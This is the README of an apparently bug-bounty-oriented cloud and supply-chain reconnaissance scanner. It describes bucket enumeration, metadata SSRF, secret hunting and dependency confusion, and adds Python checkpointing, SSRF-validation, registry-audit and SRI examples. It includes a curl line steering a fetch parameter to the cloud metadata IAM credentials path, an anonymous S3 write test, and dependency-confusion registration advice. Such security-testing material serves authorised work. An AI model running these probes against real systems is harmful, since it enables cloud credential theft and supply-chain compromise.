Sharon-Needles/cloud
GitHub: Sharon-Needles/cloud
A multi-stage automated reconnaissance scanner for cloud infrastructure and software supply-chain security, used to systematically find bucket misconfigurations, metadata SSRF, leaked cloud credentials and dependency confusion.
# cloud.sh — Cloud & Supply-Chain Scanner
**An 8-phase scanner for the cloud infrastructure and supply-chain attack surface: AWS/Azure/GCP enumeration, S3/Blob bucket discovery, metadata SSRF, serverless function probing, JS dependency analysis and dependency confusion.**
## Features
### 8-phase pipeline
| Phase | Script | What it tests |
|-------|--------|---------------|
| 1 | `cl_cloud_enum.sh` | AWS, Azure and GCP subdomain enumeration from a company keyword |
| 2 | `cl_bucket_scan.sh` | S3, Azure Blob and GCS bucket discovery; open read/write access |
| 3 | `cl_metadata_ssrf.sh` | Metadata-endpoint SSRF for IAM token theft (`169.254.169.254`, `fd00:ec2::254`) |
| 4 | `cl_serverless.sh` | Lambda, Azure Functions and Cloud Run endpoint discovery |
| 5 | `cl_js_audit.sh` | JavaScript file analysis for cloud credentials, internal endpoints and hard-coded secrets |
| 6 | `cl_dep_confusion.sh` | Dependency confusion / typosquatting in package.json and requirements.txt |
| 7 | `cl_sri_check.sh` | CDN-served JS/CSS missing Subresource Integrity |
| 8 | `cl_cloud_secrets.sh` | Cloud keys, IAM credentials and API tokens in HTML, JS and headers |
### Quality
- **Resume support**: phase-level checkpoints
- **VRT-aware output**: findings classified P1–P5
- **Keyword-driven**: phases 1 and 4 enumerate `{keyword}-prod`, `{keyword}-dev`, etc.
- **Report generation**: Markdown report with evidence, suitable for Bugcrowd/H1
## Requirements
### Required
```
sudo pacman -S curl jq
```
### Recommended
```
sudo pacman -S python3 gau katana
pip install trufflehog # or: sudo pacman -S trufflehog
```
### Optional API keys
```
export SHODAN_API_KEY="your_key" # Cloud IP enumeration
export GITHUB_TOKEN="your_token" # GitHub search for leaked cloud creds
```
## Installation
```
git clone https://github.com/Sharon-Needles/cloud
cd cloud
chmod +x cloud.sh scripts/*.sh
# global symlink (optional)
sudo ln -s "$(pwd)/cloud.sh" /usr/local/bin/cloud
```
## Quick start
### Interactive mode
```
./cloud.sh
```
### CLI mode: full scan
```
./cloud.sh --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd
```
The `--keyword` flag drives bucket and serverless enumeration (it tries `acme-prod`, `acme-dev`, `acme-staging`, etc.).
### Resume
```
./cloud.sh --resume ./hunts/Acme_CLOUD_20260423_120000
```
### Running a single phase
```
./scripts/cl_bucket_scan.sh --domains scope.txt --keyword acme -o ./bucket_results
./scripts/cl_metadata_ssrf.sh -d app.example.com -o ./ssrf_results
./scripts/cl_js_audit.sh --domains scope.txt -o ./js_results
```
## Usage
```
cloud.sh [OPTIONS]
Modes:
(no args) Interactive
--target NAME Target program name
--domains FILE File with domains (one per line)
--keyword KEYWORD Company keyword for bucket/serverless enumeration
--platform PLATFORM bugcrowd | hackerone | other
--out DIR Output directory (default: ./hunts)
--resume PATH Resume from previous run
Options:
-t, --threads N Concurrency (default: 30)
-h, --help Show help
--version Print version
```
### Examples
**Full cloud scan with a keyword:**
```
cloud --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd
```
**Bucket scan only:**
```
./scripts/cl_bucket_scan.sh --domains scope.txt --keyword "acme" -o ./bucket_out
```
**JS credential scan:**
```
./scripts/cl_js_audit.sh --domains scope.txt -o ./js_out
```
## Output structure
```
Acme_Corp_CLOUD_20260423_120000/
├── manifest.json
├── phase_status.txt
├── timeline.log
│
├── cl_cloud_enum/
│ ├── aws_domains.txt # *.amazonaws.com, *.s3.amazonaws.com
│ ├── azure_domains.txt # *.azurewebsites.net, *.blob.core.windows.net
│ ├── gcp_domains.txt # *.appspot.com, *.storage.googleapis.com
│ └── cloud_live.txt # Responding cloud endpoints
│
├── cl_bucket_scan/
│ ├── s3_candidates.txt # S3 bucket names tried
│ ├── s3_open_read.txt # Publicly readable buckets
│ ├── s3_open_write.txt # Publicly writable buckets (P1!)
│ ├── azure_blobs.txt # Azure Blob results
│ └── gcs_buckets.txt # GCS public buckets
│
├── cl_metadata_ssrf/
│ ├── ssrf_candidates.txt # Endpoints that fetch remote URLs
│ ├── metadata_responses.txt # 169.254.169.254 responses
│ └── iam_tokens.txt # Extracted IAM credentials (P1!)
│
├── cl_serverless/
│ ├── lambda_endpoints.txt # Lambda function URLs
│ ├── azure_functions.txt # Azure Function endpoints
│ └── cloud_run.txt # GCP Cloud Run services
│
├── cl_js_audit/
│ ├── js_files.txt # JS files audited
│ ├── hardcoded_creds.txt # Potential credentials in JS
│ └── internal_endpoints.txt # Internal API URLs from JS
│
├── cl_dep_confusion/
│ ├── package_files.txt # package.json, requirements.txt found
│ ├── internal_packages.txt # Internal package names identified
│ └── confusion_candidates.txt # Packages vulnerable to dep confusion
│
├── cl_sri_check/
│ └── missing_sri.txt # Third-party scripts without SRI
│
├── cl_cloud_secrets/
│ ├── secret_candidates.txt # All potential secrets found
│ └── validated_secrets.txt # Confirmed active credentials
│
├── findings.txt
├── [SUBMIT:P1].txt # Open-write buckets, leaked IAM tokens
├── [SUBMIT:P2].txt # Open-read buckets with sensitive data
├── [SUBMIT:P3].txt # Unauthenticated serverless endpoints
├── [REVIEW:P4].txt # Manual review needed
├── [DO_NOT_SUBMIT:P5].txt # SRI missing (without CDN compromise chain)
└── report.md
```
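The resume and VRT-routing behaviour described under "Quality" maps directly onto this tree: `phase_status.txt` records which phases finished, and each finding is appended both to `findings.txt` and to its priority file. The following is an added Python example (the tool itself is bash, and its internal file formats are not shown on this page, so the `<phase>=done` checkpoint line format, the helper names and the two stand-in phases are assumptions, not code from cloud.sh). It simulates a crash in the second phase and then resumes, so that only the unfinished phase re-runs.

```python
"""Phase-level checkpointing and VRT priority routing, modelled on the output
layout above (phase_status.txt, findings.txt, [SUBMIT:P1].txt, ...).
Added example in Python: the bash internals of cloud.sh are not on this page,
so the file formats and helper names below are assumptions."""
import os
import tempfile
from datetime import datetime, timezone
from typing import Callable, Dict, List, Set

# Priority -> file name, taken from the output tree above (assumed append-only text).
PRIORITY_FILES = {
    "P1": "[SUBMIT:P1].txt",
    "P2": "[SUBMIT:P2].txt",
    "P3": "[SUBMIT:P3].txt",
    "P4": "[REVIEW:P4].txt",
    "P5": "[DO_NOT_SUBMIT:P5].txt",
}
Finding = Dict[str, str]                 # {"priority": "P1", "title": ..., "evidence": ...}
Phase = Callable[[str], List[Finding]]   # phase(out_dir) -> findings


def completed_phases(hunt_dir: str) -> Set[str]:
    """Assumed checkpoint format: one '<phase>=done' line per finished phase."""
    path = os.path.join(hunt_dir, "phase_status.txt")
    if not os.path.exists(path):
        return set()
    with open(path) as fh:
        return {ln.split("=", 1)[0] for ln in fh if ln.strip().endswith("=done")}


def log(hunt_dir: str, msg: str) -> None:
    stamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    with open(os.path.join(hunt_dir, "timeline.log"), "a") as fh:
        fh.write(f"{stamp} {msg}\n")


def route_finding(hunt_dir: str, finding: Finding) -> None:
    """Append to findings.txt and to the matching priority file."""
    prio = finding["priority"]
    if prio not in PRIORITY_FILES:
        raise ValueError(f"unknown priority {prio!r}")
    line = f"[{prio}] {finding['title']}: {finding['evidence']}\n"
    for name in ("findings.txt", PRIORITY_FILES[prio]):
        with open(os.path.join(hunt_dir, name), "a") as fh:
            fh.write(line)


def count_priority(hunt_dir: str, prio: str) -> int:
    path = os.path.join(hunt_dir, PRIORITY_FILES[prio])
    if not os.path.exists(path):
        return 0
    with open(path) as fh:
        return sum(1 for _ in fh)


def run_hunt(hunt_dir: str, phases: Dict[str, Phase]) -> List[str]:
    """Run phases in order, skipping checkpointed ones; return the names that ran."""
    os.makedirs(hunt_dir, exist_ok=True)
    done = completed_phases(hunt_dir)
    ran: List[str] = []
    for name, phase in phases.items():
        if name in done:
            log(hunt_dir, f"skip {name} (checkpoint)")
            continue
        out_dir = os.path.join(hunt_dir, name)
        os.makedirs(out_dir, exist_ok=True)
        log(hunt_dir, f"start {name}")
        for finding in phase(out_dir):
            route_finding(hunt_dir, finding)
        # Checkpoint only after the phase finished cleanly: a crash mid-phase re-runs it.
        with open(os.path.join(hunt_dir, "phase_status.txt"), "a") as fh:
            fh.write(f"{name}=done\n")
        log(hunt_dir, f"done {name}")
        ran.append(name)
    return ran


def demo_phases(state: dict) -> Dict[str, Phase]:
    """Constructed stand-ins for two cl_*.sh phases; the findings are sample data."""
    def bucket_scan(out_dir: str) -> List[Finding]:
        return [
            {"priority": "P1", "title": "open-write bucket", "evidence": "s3://acme-backup (constructed)"},
            {"priority": "P5", "title": "open-read bucket, public assets only", "evidence": "s3://acme-static (constructed)"},
        ]

    def metadata_ssrf(out_dir: str) -> List[Finding]:
        if state.pop("crash", False):
            raise RuntimeError("simulated crash mid-phase")
        return [{"priority": "P4", "title": "URL-fetch parameter, needs manual review",
                 "evidence": "https://app.example.com/fetch (constructed)"}]

    return {"cl_bucket_scan": bucket_scan, "cl_metadata_ssrf": metadata_ssrf}


def run_demo() -> dict:
    """Crash during phase 2, then resume: only the unfinished phase re-runs."""
    hunt_dir = tempfile.mkdtemp(prefix="Acme_Corp_CLOUD_")
    state = {"crash": True}
    try:
        run_hunt(hunt_dir, demo_phases(state))
    except RuntimeError:
        pass
    after_crash = sorted(completed_phases(hunt_dir))
    resumed = run_hunt(hunt_dir, demo_phases(state))
    return {"after_crash": after_crash, "resumed": resumed,
            "p1": count_priority(hunt_dir, "P1"), "p4": count_priority(hunt_dir, "P4"),
            "p5": count_priority(hunt_dir, "P5")}


if __name__ == "__main__":
    print(run_demo())
```

The checkpoint is written only after a phase returns, which is what makes `--resume` safe: a phase interrupted halfway is re-run from scratch rather than silently skipped with partial output.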
## High-value finding patterns
### S3 bucket with open write access (P1)
```
aws s3 ls s3://acme-backup/ --no-sign-request
aws s3 cp test.txt s3://acme-backup/ --no-sign-request
```
If the write succeeds: P1 Critical. An attacker can backdoor static assets or host phishing content.
### Metadata SSRF → IAM token (P1)
A webhook or URL-fetch parameter → redirected to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`:
```
curl "https://app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```
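The defensive counterpart to this finding is a destination check on every user-supplied URL the application fetches. The following is an added Python example, not part of cloud.sh or of any fetcher the page describes: it rejects non-`http(s)` schemes, the metadata hosts named in the phase table above, and any hostname that resolves to a link-local, private or otherwise non-public address. The function names and the offline lookup table (`offline_resolver`) are assumptions so the example runs without DNS.

```python
"""Destination check for a URL-fetch/webhook feature: refuse URLs that resolve to
the instance metadata service or any other non-public address. Added example in
Python; the function names and the offline resolver are assumptions, not
cl_metadata_ssrf.sh or any fetcher in cloud.sh."""
import ipaddress
import socket
from typing import Callable, Dict, List
from urllib.parse import urlsplit

# Metadata hosts named in the phase table above, plus GCP's DNS name. The address
# checks below already reject them; the list just gives a clearer deny reason.
METADATA_HOSTS = {"169.254.169.254", "fd00:ec2::254", "metadata.google.internal"}
Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """All A/AAAA answers for host, i.e. every address the fetcher might connect to."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_public_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # judge ::ffff:169.254.169.254 by the embedded IPv4
    return ip.is_global and not (ip.is_link_local or ip.is_loopback
                                 or ip.is_multicast or ip.is_reserved)


def check_fetch_url(url: str, resolver: Resolver = system_resolver) -> str:
    """Return 'allow' or 'deny: <reason>' for a user-supplied fetch URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"deny: scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return "deny: no host"
    if host.lower() in METADATA_HOSTS:
        return f"deny: metadata host {host}"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal: no lookup needed
    except ValueError:
        # Hostnames, and also odd spellings such as a decimal IPv4 ("2852039166"),
        # are judged by what they actually resolve to.
        addrs = resolver(host)
        if not addrs:
            return f"deny: {host} does not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return f"deny: {host} resolves to non-public {addr}"
    return "allow"


def offline_resolver(host: str) -> List[str]:
    """Constructed lookup table so the example runs without DNS."""
    table: Dict[str, List[str]] = {
        "app.example.com": ["93.184.216.34"],           # sample public address
        "internal.example.com": ["10.0.0.5"],
        "rebind.example.com": ["93.184.216.34", "169.254.169.254"],
        "2852039166": ["169.254.169.254"],              # what inet_aton makes of the decimal form
    }
    return table.get(host, [])


if __name__ == "__main__":
    for u in ("https://app.example.com/hook", "http://169.254.169.254/latest/meta-data/",
              "http://[fd00:ec2::254]/", "http://2852039166/", "http://internal.example.com/",
              "file:///etc/passwd"):
        print(f"{u:45} -> {check_fetch_url(u, offline_resolver)}")
```

Two caveats apply in production: the fetcher must connect to the address that was validated rather than resolve the name a second time (otherwise a DNS-rebinding answer defeats the check), and every redirect target must go through `check_fetch_url` again, since the page's own example relies on a redirect. On AWS, requiring IMDSv2 (a session token obtained via PUT, with a hop limit of 1) removes the one-shot GET path this finding depends on even if the application check is bypassed.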
### Open-read bucket with sensitive files (P2)
The bucket is readable but not writable. If it contains backups, config files, credentials or PII → P2.
If it contains only public assets → P5 (do not submit).
### Dependency confusion (P2–P3)
An internal package name (e.g. `acme-internal-lib`) is found that does not exist on npm/PyPI.
Registering that name on the public registry → every CI/CD system will install your version.
### Missing SRI (P5; never submit alone)
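From the defender's side, the question phase 6 raises is whether each internal-looking name is actually pinned to a private registry. The following is an added Python example, not the logic of `cl_dep_confusion.sh`: it reads `package.json` together with `.npmrc` scope pins, and `requirements.txt` together with `pip.conf`, and lists internal-looking packages whose resolution could still reach the public registry. The manifests, config snippets and the "company keyword appears in the name" heuristic are constructed assumptions.

```python
"""Registry-pinning audit for internal package names: a defender-side counterpart
to the dependency-confusion check in phase 6. Added example in Python; the
manifests, config files and 'looks internal' heuristic are constructed
assumptions, not the logic of cl_dep_confusion.sh."""
import configparser
import json
import re
from typing import Dict, List


def npm_dependencies(package_json: str) -> List[str]:
    data = json.loads(package_json)
    names: List[str] = []
    for key in ("dependencies", "devDependencies", "optionalDependencies"):
        names.extend(data.get(key, {}).keys())
    return names


def pip_requirements(requirements_txt: str) -> List[str]:
    """Bare project names from requirements.txt (comments, options and -e lines skipped)."""
    names: List[str] = []
    for line in requirements_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if m:
            names.append(m.group(0).lower())
    return names


def npm_scoped_registries(npmrc: str) -> Dict[str, str]:
    """'@scope:registry=URL' lines from .npmrc: the per-scope pin npm honours."""
    pins: Dict[str, str] = {}
    for line in npmrc.splitlines():
        m = re.match(r"\s*(@[^:\s]+):registry\s*=\s*(\S+)", line)
        if m:
            pins[m.group(1)] = m.group(2)
    return pins


def looks_internal(name: str, keyword: str) -> bool:
    """Assumed heuristic: the company keyword appears in the package name or scope."""
    return keyword.lower() in name.lower()


def audit_npm(package_json: str, npmrc: str, keyword: str) -> List[str]:
    """Internal-looking npm packages whose scope is not pinned to a private registry.
    Unscoped names cannot be pinned per-package in .npmrc, so they are always listed."""
    pins = npm_scoped_registries(npmrc)
    at_risk: List[str] = []
    for name in npm_dependencies(package_json):
        if not looks_internal(name, keyword):
            continue
        scope = name.split("/", 1)[0] if name.startswith("@") else None
        if scope in pins:
            continue
        at_risk.append(name)
    return at_risk


def private_index_only(pip_conf: str) -> bool:
    """pip resolves across *all* configured indexes, so the only safe shape is a single
    private index-url with no extra-index-url (assumed: pypi.org counts as public)."""
    cfg = configparser.ConfigParser()
    cfg.read_string(pip_conf)
    if not cfg.has_option("global", "index-url") or cfg.has_option("global", "extra-index-url"):
        return False
    return "pypi.org" not in cfg.get("global", "index-url")


def audit_pip(requirements_txt: str, pip_conf: str, keyword: str) -> List[str]:
    if private_index_only(pip_conf):
        return []
    return [n for n in pip_requirements(requirements_txt) if looks_internal(n, keyword)]


# Constructed sample inputs.
PACKAGE_JSON = json.dumps({"name": "acme-web", "dependencies": {
    "@acme/internal-lib": "^1.2.0", "acme-internal-lib": "1.0.0", "lodash": "^4.17.21"}})
NPMRC = "@acme:registry=https://npm.internal.example/\n"
REQUIREMENTS = "requests==2.31.0\nacme-auth-client==0.4.1  # internal\n-e ./vendor/tool\n"
PIP_CONF_MIXED = ("[global]\nindex-url = https://pypi.org/simple\n"
                  "extra-index-url = https://pypi.internal.example/simple\n")
PIP_CONF_PRIVATE = "[global]\nindex-url = https://pypi.internal.example/simple\n"

if __name__ == "__main__":
    print("npm at risk:", audit_npm(PACKAGE_JSON, NPMRC, "acme"))
    print("pip at risk (mixed indexes):", audit_pip(REQUIREMENTS, PIP_CONF_MIXED, "acme"))
    print("pip at risk (private only):", audit_pip(REQUIREMENTS, PIP_CONF_PRIVATE, "acme"))
```

The two ecosystems need different fixes, and the audit reflects that: for npm, moving internal packages under a scope that `.npmrc` maps to the private registry closes the gap, whereas an unscoped `acme-internal-lib` stays flagged no matter what `.npmrc` says; for pip, `extra-index-url` is the setting that lets a higher version on public PyPI win, so the fix is a single private index (or a proxy that serves both) rather than a second index.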
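Phase 7 flags cross-origin scripts and stylesheets that carry no `integrity` attribute; the fix on the site owner's side is to add one and to send `crossorigin="anonymous"`. The following is an added Python example, not the logic of `cl_sri_check.sh`: it collects `<script src>` and `<link rel="stylesheet">` tags from a page, reports the third-party ones without SRI, computes the `integrity` value for a resource body, and verifies a value the way a browser does (only the strongest listed algorithm counts). The sample HTML, the `cdn.example.net` host and the helper names are constructed assumptions.

```python
"""Find third-party <script>/<link rel=stylesheet> resources without an integrity
attribute, and compute or verify the SRI value. Added example in Python; the HTML
and helper names are constructed assumptions, not the logic of cl_sri_check.sh."""
import base64
import hashlib
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlsplit

STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}   # the algorithms SRI allows


class _ResourceCollector(HTMLParser):
    """Collect external scripts and stylesheets with their integrity attribute."""
    def __init__(self) -> None:
        super().__init__()
        self.resources: List[dict] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.resources.append({"url": a["src"], "integrity": a.get("integrity", "")})
        elif tag == "link" and a.get("rel", "").lower() == "stylesheet" and a.get("href"):
            self.resources.append({"url": a["href"], "integrity": a.get("integrity", "")})


def third_party_without_sri(html: str, site_host: str) -> List[str]:
    """URLs of cross-origin scripts/styles that carry no integrity attribute."""
    parser = _ResourceCollector()
    parser.feed(html)
    flagged: List[str] = []
    for res in parser.resources:
        host = urlsplit(res["url"]).hostname    # None for relative URLs
        if host is None or host == site_host.lower():
            continue                             # same-origin: SRI is optional
        if not res["integrity"].strip():
            flagged.append(res["url"])
    return flagged


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """The integrity value to put on the tag for this exact resource body."""
    if algo not in STRENGTH:
        raise ValueError(f"unsupported SRI algorithm {algo!r}")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, content).digest()).decode()}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Browser-style check: only tokens of the strongest listed algorithm count,
    and any one of them matching is enough."""
    tokens = [t for t in integrity.split() if t.partition("-")[0] in STRENGTH]
    if not tokens:
        return False
    best = max(STRENGTH[t.partition("-")[0]] for t in tokens)
    return any(sri_hash(content, t.partition("-")[0]) == t
               for t in tokens if STRENGTH[t.partition("-")[0]] == best)


# Constructed page for the demo; cdn.example.net stands in for any CDN.
SAMPLE_HTML = """
<script src="https://cdn.example.net/lib.js" integrity="sha384-placeholder" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/other.js"></script>
<link rel="stylesheet" href="//cdn.example.net/site.css">
<script src="/static/app.js"></script>
<script src="https://www.acme.example/static/app2.js"></script>
"""

if __name__ == "__main__":
    for url in third_party_without_sri(SAMPLE_HTML, "www.acme.example"):
        print("missing integrity:", url)
    body = b"console.log('hello');\n"   # the body the CDN would serve (constructed)
    tag = sri_hash(body)
    print("integrity to add:", tag, "verifies:", verify_sri(body, tag))
```

A missing attribute on its own only matters if the CDN is compromised or its content changes, which is why the README files it under P5; the same helper is still useful to the site owner, because `sri_hash` over the exact bytes served gives the value to pin, and `verify_sri` shows why a stale pin breaks the page rather than loading the new file.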